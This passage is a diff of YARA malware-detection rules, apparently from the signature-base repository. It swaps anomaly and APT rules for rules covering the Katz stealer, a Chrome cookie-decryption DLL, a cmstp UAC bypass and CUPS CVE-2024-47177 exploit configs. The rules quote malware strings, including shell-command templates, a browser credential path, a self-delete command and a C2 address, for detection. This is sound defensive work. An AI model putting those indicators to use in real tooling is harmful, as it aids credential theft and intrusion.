-		reference = "https://webserver2.tecgraf.puc-rio.br/~ismael/Cursos/YC++/apostilas/win32_xcoff_pe/tyne-example/Tiny%20PE.htm"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_file_anomalies.yar#L3-L15"
+		description = "Detects Katz stealer"
+		author = "MalGamy (Nextron Systems)"
+		id = "efa42aec-b653-5e94-8d5b-73f0aab2a54d"
+		date = "2025-05-16"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5eabfa8e0fd4d6d1376d263484fba985e7a4b05d68046be1f79c1dfdbbfff9e5"
+		hash = "fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789"
+		hash = "d92bb6e47cb0a0bdbb51403528ccfe643a9329476af53b5a729f04a4d2139647"
+		logic_hash = "73364c2291dc792f46858dda057f08805db55fe1f1e54d6b0dee0a0c8a412259"
 		score = 80
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$header = { 4D 5A 00 00 50 45 00 00 }
+		$s1 = "Motherboard Product: %s" ascii
+		$s2 = "cmd.exe /c %s" ascii
+		$s3 = "reg export \"%s\" \"%s\" /y" ascii
+		$s4 = ").request({ hostname: '" ascii
+		$s5 = "Type: Removable"
+		$s6 = "%s\\Microsoft\\Windows Live Mail" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint16( 4 ) == 0x4550 and filesize <= 20KB and $header at 0
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them
 }
-rule SIGNATURE_BASE_SUSP_GIF_Anomalies : FILE
+rule SIGNATURE_BASE_MAL_DLL_Chrome_App_Bound_Encryption_Decryption_May25 : FILE
 {
 	meta:
-		description = "Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2e77c2ff-a8f6-5444-a93d-843312640a28"
-		date = "2020-07-02"
-		modified = "2023-12-05"
-		reference = "https://en.wikipedia.org/wiki/GIF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_file_anomalies.yar#L17-L30"
+		description = "Detects a DLL used to decrypt App-Bound Encrypted (ABE) cookies, passwords and payment methods from Chromium-based browsers. Seen being used by Katz stealer"
+		author = "MAlGamy"
+		id = "bc77e972-fd7e-55dd-b118-ee76f19cde1a"
+		date = "2025-05-19"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L23-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "64d17c8de72600cd889a802fd002faaaf9a3a17f7fa157ae5b2b620b28e6c439"
-		score = 60
+		hash = "6dc8e99da68b703e86fa90a8794add87614f254f804a8d5d65927e0676107a9d"
+		logic_hash = "d5488728a3ee8f2f59ed9798b80d516f7f131e39b3d5099ad5168ffc8ff22718"
+		score = 80
 		quality = 85
 		tags = "FILE"
 
+	strings:
+		$s1 = "Failed to set proxy blanket." ascii
+		$s2 = "Decryption failed. Last error:" ascii
+		$s3 = "\\Google\\Chrome\\User Data\\Local State" ascii
+		$op1 = {48 39 F3 74 ?? 4C 89 E2 48 89 E9 E8 ?? ?? ?? ?? 48 89 C1 48 8B 00 B2 ?? 48 8B 40 ?? 48 C7 44 01 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 13 48 89 C1 E8 ?? ?? ?? ?? 48 FF C3 EB ?? 48 8D 54 24 ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 48 89 F8 48 81 C4}
+
 	condition:
-		uint16( 0 ) == 0x4947 and uint8( 2 ) == 0x46 and uint8( 11 ) != 0x00 and uint8( 12 ) != 0x00 and uint8( filesize -1 ) != 0x3b
+		uint16( 0 ) == 0x5a4d and filesize < 2MB and $op1 and 1 of ( $s* )
 }
-
-rule SIGNATURE_BASE_SUSP_Hxd_Icon_Anomaly_May23_1 : FILE
+rule SIGNATURE_BASE_SUSP_Katz_Log_May25 : FILE
 {
 	meta:
-		description = "Detects suspicious use of the the free hex editor HxD's icon in PE files that don't seem to be a legitimate version of HxD"
-		author = "Florian Roth"
-		id = "3ac8cc92-6d76-5787-ada0-cfb6eabb4b20"
-		date = "2023-05-29"
-		modified = "2023-12-05"
-		reference = "https://www.linkedin.com/feed/update/urn:li:activity:7068631930040188929/?utm_source=share&utm_medium=member_ios"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_file_anomalies.yar#L32-L84"
+		description = "Detects log file that contains system reconnaissance data, seen being generated by Katz stealer"
+		author = "MalGamy"
+		id = "29ef2f42-d360-59f9-bb70-b0c68f9dfb7c"
+		date = "2025-05-20"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L43-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a328687ac8b868fb78a49188b286a8951c6043a7ff6ff0c7a23c3f9b3ef15eb2"
+		hash = "1ac196ac6393d786618c944a7ab77fb189a6b4ba00af5c0f987c3dc65876c060"
+		hash = "ad76e2727469525dec7e56977589dd250ca57a29b8b0d42cd5c42e536c285241"
+		hash = "e1a0d6929662bcbc9e5e0827cb8b6d7818088e996cf971d2a4a1c1ca4208e533"
+		hash = "b10796c41e1cec7c84a3c68bfcaa7b20f49b620d1c94304a6b3ed73471fa9031"
+		hash = "5a984e2e308fe84e4e2071dd877772361719ba0217c2c23da79dbb82dc15eac8"
+		logic_hash = "847ab8f9a7abf260f4185d41ae9cb9af40c28726338ff2306a75d2160ae61f03"
 		score = 65
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$ac1 = { 99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
-               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
-               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
-               99 00 77 0D DD 09 99 80 99 00 77 0D DD 09 99 80
-               99 00 77 0D DD 09 99 80 99 00 77 0D D0 99 98 09
-               99 99 00 0D D0 99 98 09 99 99 00 0D D0 99 98 09
-               99 99 00 0D D0 99 98 0F F9 99 00 0D D0 99 98 09
-               9F 99 00 0D D0 99 98 09 FF 99 00 0D D0 99 98 09
-               FF 99 00 0D D0 99 98 09 99 99 00 0D D0 99 98 0F
-               F9 99 00 0D D0 99 98 09 99 99 00 0D 09 99 80 9F
-               F9 99 99 00 09 99 80 99 F9 99 99 00 09 99 80 FF }
-		$ac2 = { FF FF FF FF FF FF FF FF FF FF FF FF FF FF B9 DE
-               FA 68 B8 F4 39 A2 F1 39 A2 F1 39 A2 F1 39 A2 F1
-               39 A2 F1 39 A2 F1 68 B8 F4 B9 DE FA FF FF FF FF
-               FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF }
-		$s1 = { 00 4D 00 61 00 EB 00 6C 00 20 00 48 00 F6 00 72 00 7A }
-		$s2 = "mh-nexus.de" ascii wide
-		$upx1 = "UPX0" ascii fullword
-		$xs1 = "terminator" ascii wide fullword
-		$xs2 = "Terminator" ascii wide fullword
+		$s1 = "Motherboard Manufacturer:" ascii
+		$s2 = "===== System Information =====" ascii
+		$s3 = "Volume Name:" ascii
+		$s4 = "Desktop Hostname:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $ac* ) and ( not 1 of ( $s* ) or filesize > 6930000 or ( pe.is_32bit ( ) and filesize < 1540000 and not $upx1 ) or ( pe.is_32bit ( ) and filesize < 590000 and $upx1 ) or ( pe.is_64bit ( ) and filesize < 6670000 and not $upx1 ) or ( pe.is_64bit ( ) and filesize < 1300000 and $upx1 ) or 1 of ( $xs* ) )
+		filesize < 50KB and 3 of them
 }
-rule SIGNATURE_BASE_Xdedic_Sysscan_Unpacked : CRIMEWARE FILE
+rule SIGNATURE_BASE_MAL_NET_Katz_Stealer_Loader_May25
 {
 	meta:
-		description = "Detects SysScan APT tool"
-		author = " Kaspersky Lab"
-		id = "4f5d37b3-e3aa-51ec-b36e-b494c8abe227"
-		date = "2016-03-14"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/75027/xdedic-the-shady-world-of-hacked-servers-for-sale/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sysscan.yar#L1-L27"
+		description = "Detects .NET based Katz stealer loader"
+		author = "Jonathan Peters (cod3nym)"
+		id = "90e86bb2-ffb2-5968-9cdc-705efac73b0d"
+		date = "2025-05-21"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L65-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "df0834e89c512721547001c910c1461f028a46e954dd51017d4e8bde7893d04a"
-		score = 75
+		hash = "0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7"
+		logic_hash = "1922520d8c34660a0afff2f552ef0d1c6ec093fb10a00816e0216f574b686221"
+		score = 80
 		quality = 85
-		tags = "CRIMEWARE, FILE"
-		maltype = "crimeware"
-		type = "crimeware"
-		filetype = "Win32 EXE"
-		version = "1.0"
-		hash1 = "fac495be1c71012682ebb27092060b43"
-		hash2 = "e8cc69231e209db7968397e8a244d104"
-		hash3 = "a53847a51561a7e76fd034043b9aa36d"
-		hash4 = "e8691fa5872c528cd8e72b82e7880e98"
-		hash5 = "F661b50d45400e7052a2427919e2f777"
+		tags = ""
 
 	strings:
-		$a1 = "/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"" ascii wide
-		$a2 = "SysScan DEBUG Mode!!!" ascii wide
-		$a3 = "This rechecking? (set 0/1 or press enter key)" ascii wide
-		$a4 = "http://37.49.224.144:8189/manual_result" ascii wide
-		$b1 = "Checker end work!" ascii wide
-		$b2 = "Trying send result..." ascii wide
+		$x = "ExecutarMetodoVAI" ascii
+		$s1 = "VirtualMachineDetector" ascii
+		$s2 = "Wow64SetThreadContext_API" ascii
+		$s3 = "nomedoarquivo" ascii
+		$s4 = { 65 78 74 65 6E C3 A7 61 6F 00 }
+		$s5 = "payloadBuffer" ascii
+		$s6 = "caminhovbs" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 5000000 and ( any of ( $a* ) or all of ( $b* ) )
+		3 of ( $s* ) or $x
 }
-rule SIGNATURE_BASE_Xdedic_Packed_Syscan : FILE
+rule SIGNATURE_BASE_MAL_NET_UAC_Bypass_May25 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Kaspersky Lab - modified by Florian Roth"
-		id = "da8e59f3-53f9-504b-afff-9caab798db6c"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sysscan.yar#L29-L39"
+		description = "Detects .NET based tool abusing legitimate Windows utility cmstp.exe to bypass UAC (User-Admin-Controls)"
+		author = "Jonathan Peters (cod3nym)"
+		id = "5d714088-c917-51b5-b422-1d8fa00b1949"
+		date = "2025-05-21"
+		modified = "2025-05-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L86-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "04eb5b056e892b2c2cf87e3770847226cccaceb1c743f3b9f8ac548026747ccf"
-		score = 75
-		quality = 83
+		hash = "4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7"
+		hash = "fcad234dc2ad5e2d8215bcf6caac29aef62666c34564e723fa6d2eee8b6468ed"
+		logic_hash = "4a3f6e90af6f9a8a4dfa8e336eb8c714e5f02625ca2bf5bf8b1bca9cbda6a99e"
+		score = 80
+		quality = 85
 		tags = "FILE"
-		company = "Kaspersky Lab"
 
 	strings:
-		$a1 = "SysScan.exe" nocase ascii wide
-		$a2 = "1.3.4." wide
+		$x1 = "CmstpBypass" ascii
+		$x2 = { 52 00 45 00 50 00 4C 00 41 00 43 00 45 00 5F 00 43 00 4F 00 4D 00 4D 00 41 00 4E 00 44 00 5F 00 4C 00 49 00 4E 00 45 00 00 13 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 00 00 33 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 }
+		$x3 = { 52 00 45 00 50 00 4C 00 41 00 43 00 45 00 5F 00 43 00 4F 00 4D 00 4D 00 41 00 4E 00 44 00 5F 00 4C 00 49 00 4E 00 45 00 0D 00 0A 00 74 00 61 00 73 00 6B 00 6B 00 69 00 6C 00 6C 00 20 00 2F 00 49 00 4D 00 20 00 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 500KB and filesize < 1500KB and all of them
+		uint16( 0 ) == 0x5a4d and $x1 or 1 of ( $x2 , $x3 )
 }
-rule SIGNATURE_BASE_No_Powershell : FILE
+rule SIGNATURE_BASE_Sofacy_Jun16_Sample1 : FILE
 {
 	meta:
-		description = "Detects an C# executable used to circumvent PowerShell detection - file nps.exe"
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "362a61bc-2c10-5076-93be-9f8b5a9ae8ba"
-		date = "2016-05-21"
+		id = "62b577e3-7ccb-59df-a944-96ffe9b16d3d"
+		date = "2016-06-14"
 		modified = "2023-12-05"
-		reference = "https://github.com/Ben0xA/nps"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_nopowershell.yar#L8-L23"
+		reference = "http://goo.gl/mzAa97"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_jun16.yar#L10-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9fba467cfbf8cad0c8e6cf1e1c7eacd8b0be869ebe6c5180f50f5cdefa8b5bb5"
-		score = 80
+		logic_hash = "761cec3d04e6b5273cfb450000023ed10ea73d17648c0af7660f4ef2b37fc31c"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "64f811b99eb4ae038c88c67ee0dc9b150445e68a2eb35ff1a0296533ae2edd71"
+		hash1 = "be1cfa10fcf2668ae01b98579b345ebe87dab77b6b1581c368d1aba9fd2f10a0"
 
 	strings:
-		$s1 = "nps.exe -encodedcommand {base64_encoded_command}" fullword wide
-		$s2 = "c:\\Development\\ghps\\nps\\nps\\obj\\x86\\Release\\nps.pdb" fullword ascii
+		$s1 = "clconfg.dll" fullword ascii
+		$s2 = "ASijnoKGszdpodPPiaoaghj8127391" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $s* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT_APT28_Generic_Poco_Openssl
+rule SIGNATURE_BASE_Sofacy_Jun16_Sample2 : FILE
 {
 	meta:
-		description = "Rule to detect statically linked POCO and OpenSSL libraries (COULD be Drovorub related and should be further investigated)"
-		author = "NSA / FBI"
-		id = "b6d2477b-c9a2-5858-87cf-aa006109bc8f"
-		date = "2020-08-13"
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "21561e13-a190-565e-a08b-e6a07c84c3db"
+		date = "2016-06-14"
 		modified = "2023-12-05"
-		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28_drovorub.yar#L1-L21"
+		reference = "http://goo.gl/mzAa97"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_jun16.yar#L27-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b6a78c358b3aee6b172ec29e72ce810c6fbf332f180d5879f0889f47688225e1"
-		score = 50
+		logic_hash = "a1f334996527556334c34d0308da6165e9d2a3d7eb8b2ecc322b574dea4d4844"
+		score = 85
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "57d230ddaf92e2d0504e5bb12abf52062114fb8980c5ecc413116b1d6ffedf1b"
+		hash2 = "69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261"
+		hash3 = "aeeab3272a2ed2157ebf67f74c00fafc787a2b9bbaa17a03be1e23d4cb273632"
 
 	strings:
-		$mw1 = { 89 F1 48 89 FE 48 89 D7 48 F7 C6 FF FF FF FF 0F 84 6B 02 00 00 48 F7 C7
-                 FF FF FF FF 0F 84 5E 02 00 00 48 8D 2D }
-		$mw2 = { 41 54 49 89 D4 55 53 F6 47 19 04 48 8B 2E 75 08 31 DB F6 45 00 03 75 }
-		$mw3 = { 85C0BA15000000750989D05BC30F1F44 0000BE }
-		$mw4 = { 53 8A 47 08 3C 06 74 21 84 C0 74 1D 3C 07 74 20 B9 ?? ?? ?? ?? BA FD 03
-                 00 00 BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E8 06 3C 01 77 2B 48 8B 1F 48 8B 73
-                 10 48 89 DF E8 ?? ?? ?? ?? 48 8D 43 08 48 C7 43 10 00 00 00 00 48 C7 43 28 00 00 00 00 48
-                 89 43 18 48 89 43 20 5B C3 }
+		$x1 = "DGMNOEP" fullword ascii
+		$x2 = "/%s%s%s/?%s=" fullword ascii
+		$s1 = "Control Panel\\Dehttps=https://%snetwork.proxy.ht2" fullword ascii
+		$s2 = "http=http://%s:%Control Panel\\Denetwork.proxy.ht&ol1mS9" fullword ascii
+		$s3 = "svchost.dll" fullword wide
+		$s4 = "clconfig.dll" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $x* ) ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_APT_APT28_Drovorub_Library_And_Unique_Strings : FILE
+rule SIGNATURE_BASE_Sofacy_Jun16_Sample3 : FILE
 {
 	meta:
-		description = "Rule to detect Drovorub-server, Drovorub-agent, and Drovorub-client"
-		author = "NSA / FBI"
-		id = "8e010356-09c7-5897-9cbe-051cd0800502"
-		date = "2020-08-13"
+		description = "Detects Sofacy Malware mentioned in PaloAltoNetworks APT report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f97bc840-0d9a-5a9e-9e13-7b7f8acc53a5"
+		date = "2016-06-14"
 		modified = "2023-12-05"
-		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28_drovorub.yar#L23-L42"
+		reference = "http://goo.gl/mzAa97"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sofacy_jun16.yar#L51-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "adb0d4cb6d589213e6a125d3cc20fcea8164b697bdd24d897ce75e7c7f06120a"
-		score = 75
+		logic_hash = "bdc6fcc30ebd7a966391747e4156a6d94dc9187e8b8898de4c441540ec4e637e"
+		score = 85
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785"
 
 	strings:
-		$s1 = "Poco" ascii wide
-		$s2 = "Json" ascii wide
-		$s3 = "OpenSSL" ascii wide
-		$a1 = "clientid" ascii wide
-		$a2 = "-----BEGIN" ascii wide
-		$a3 = "-----END" ascii wide
-		$a4 = "tunnel" ascii wide
+		$s1 = "ASLIiasiuqpssuqkl713h" fullword wide
 
 	condition:
-		( filesize > 1MB and filesize < 10MB and ( uint32( 0 ) == 0x464c457f ) ) and ( #s1 > 20 and #s2 > 15 and #s3 > 15 and all of ( $a* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and $s1
 }
-rule SIGNATURE_BASE_APT_APT28_Drovorub_Unique_Network_Comms_Strings
+rule SIGNATURE_BASE_EXPL_LNX_CUPS_CVE_2024_47177_Sep24 : CVE_2024_47177 FILE
 {
 	meta:
-		description = "Rule to detect Drovorub-server, Drovorub-agent, or Drovorub-client based"
-		author = "NSA / FBI"
-		id = "c6a930e8-c1c0-5d96-9051-7516df848b45"
-		date = "2020-08-13"
-		modified = "2023-12-05"
-		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt28_drovorub.yar#L44-L72"
+		description = "Detects exploit code for CUPS CVE-2024-47177"
+		author = "Florian Roth"
+		id = "a7b986ad-e943-5350-a6e0-34c40f07874c"
+		date = "2024-09-27"
+		modified = "2024-12-12"
+		reference = "https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cups_sep24.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8c82766b76c36fe64c6aa99577e1997d7181dbd36a4c27329845ae8a413f5327"
+		logic_hash = "633314dea5e3cbdf3cef6e4f18c2efca261dfc600bb9c11d0834fdae102ac9e6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "CVE-2024-47177, FILE"
 
 	strings:
-		$s_01 = "action" wide ascii
-		$s_02 = "auth.commit" wide ascii
-		$s_03 = "auth.hello" wide ascii
-		$s_04 = "auth.login" wide ascii
-		$s_05 = "auth.pending" wide ascii
-		$s_06 = "client_id" wide ascii
-		$s_07 = "client_login" wide ascii
-		$s_08 = "client_pass" wide ascii
-		$s_09 = "clientid" wide ascii
-		$s_10 = "clientkey_base64" wide ascii
-		$s_11 = "file_list_request" wide ascii
-		$s_12 = "module_list_request" wide ascii
-		$s_13 = "monitor" wide ascii
-		$s_14 = "net_list_request" wide ascii
-		$s_15 = "server finished" wide ascii
-		$s_16 = "serverid" wide ascii
-		$s_17 = "tunnel" wide ascii
+		$s1 = "FoomaticRIPCommandLine: " ascii
+		$s2 = "cupsFilter2 : " ascii
 
 	condition:
-		all of them
+		filesize < 400KB and all of them
 }
-
-rule SIGNATURE_BASE_MAL_Hogfish_Report_Related_Sample : FILE
+rule SIGNATURE_BASE_SUSP_EXPL_LNX_CUPS_CVE_2024_47177_Sep24 : CVE_2024_47177
 {
 	meta:
-		description = "Detects APT10 / Hogfish related samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7fc4fdda-b71f-5c9c-87a4-5d8290b99348"
-		date = "2018-05-01"
-		modified = "2023-12-05"
-		reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt10_redleaves.yar#L13-L31"
+		description = "Detects suspicious FoomaticRIPCommandLine command in printer config, which could be used to exploit CUPS CVE-2024-47177"
+		author = "Florian Roth"
+		id = "cb76f1c7-6dc0-5fed-a970-2a4890db46d3"
+		date = "2024-09-27"
+		modified = "2024-12-12"
+		reference = "https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cups_sep24.yar#L17-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bff74f7a72a3e40e828284ed37b2f7ea64d8df52e946372d38e379d9b7b7a445"
-		score = 75
+		logic_hash = "2158ca8a08cb7552e2a437de025e3aad63ddc5417245e6ede7283d3bd0fc159b"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f9acc706d7bec10f88f9cfbbdf80df0d85331bd4c3c0188e4d002d6929fe4eac"
-		hash2 = "7188f76ca5fbc6e57d23ba97655b293d5356933e2ab5261e423b3f205fe305ee"
-		hash3 = "4de5a22cd798950a69318fdcc1ec59e9a456b4e572c2d3ac4788ee96a4070262"
+		tags = "CVE-2024-47177"
 
 	strings:
-		$s1 = "R=user32.dll" fullword ascii
+		$ = "FoomaticRIPCommandLine: \"bash " ascii
+		$ = "FoomaticRIPCommandLine: \"sh " ascii
+		$ = "FoomaticRIPCommandLine: \"python " ascii
+		$ = "FoomaticRIPCommandLine: \"perl " ascii
+		$ = "FoomaticRIPCommandLine: \"echo " ascii
+		$ = "FoomaticRIPCommandLine: \\\"bash " ascii
+		$ = "FoomaticRIPCommandLine: \\\"sh " ascii
+		$ = "FoomaticRIPCommandLine: \\\"python " ascii
+		$ = "FoomaticRIPCommandLine: \\\"perl " ascii
+		$ = "FoomaticRIPCommandLine: \\\"echo " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or 1 of them )
+		1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Redleaves_Apr18_1 : FILE
+rule SIGNATURE_BASE_SUSP_SVG_JS_Payload_Mar25 : FILE
 {
 	meta:
-		description = "Detects RedLeaves malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "578b40d7-6818-56d5-92ce-535141c0aa8e"
-		date = "2018-05-01"
-		modified = "2023-12-05"
-		reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt10_redleaves.yar#L33-L48"
+		description = "Detects a suspicious SVG file that contains a JavaScript payload. This rule is a generic rule that might generate false positives. A match should be further investigated."
+		author = "Florian Roth"
+		id = "cdb22283-8427-5c25-b653-d6d76dd27dc6"
+		date = "2025-03-20"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_svg_js_phish_mar25.yar#L3-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e34b95e96de88aef20050b6b9580600365284117918c24f76c884b089fa20623"
-		score = 75
+		hash = "7b4b8e42d4df56412969cd1c38dcb750d21b10a54d257a9b918bd6ae0e0f8d11"
+		hash = "4ae2ebc103f5de7ccfd75603b543d602b5c793e1ef7db19fbb60ff2e42611f75"
+		hash = "b92e9d6f8a516e78b3e848c4b5b2815b406c9478e6be3777f3e784ceedc66f4a"
+		hash = "23ea832d503b02e9edbdbf9ed8ce0b19376d44580d21906d9da834de69f7dfcb"
+		hash = "4f33dff59753773a596798ee58fb899c5382c6ec2951b457554aebe5c05ec0cd"
+		hash = "b8be8e009b08c04857dc2388544d61db57c0dd1841371aa7e4bf3ee2010ef1a8"
+		hash = "cdcbe23f284067c4e863f76370f8612d85bef0410ca0bb5684112a8c16eff21c"
+		hash = "5b3d11109e0d10b9266cbfbb6906e728c4470d752f95769280666d1166df4b43"
+		hash = "a7620155da2a576823dbe7963ff4a5f79702645edb8b2ae67b8af8ba7eac697b"
+		hash = "52e1c6279dc151616bbd85ac7d0abc42cab5850deb6da2e2b20e339f79c3536a"
+		logic_hash = "a9239fd09b656f985b3f930ba7b3ab3999dfcd315010f3bf648fffd5ed0a8834"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		hash1 = "f6449e255bc1a9d4a02391be35d0dd37def19b7e20cfcc274427a0b39cb21b7b"
-		hash2 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d"
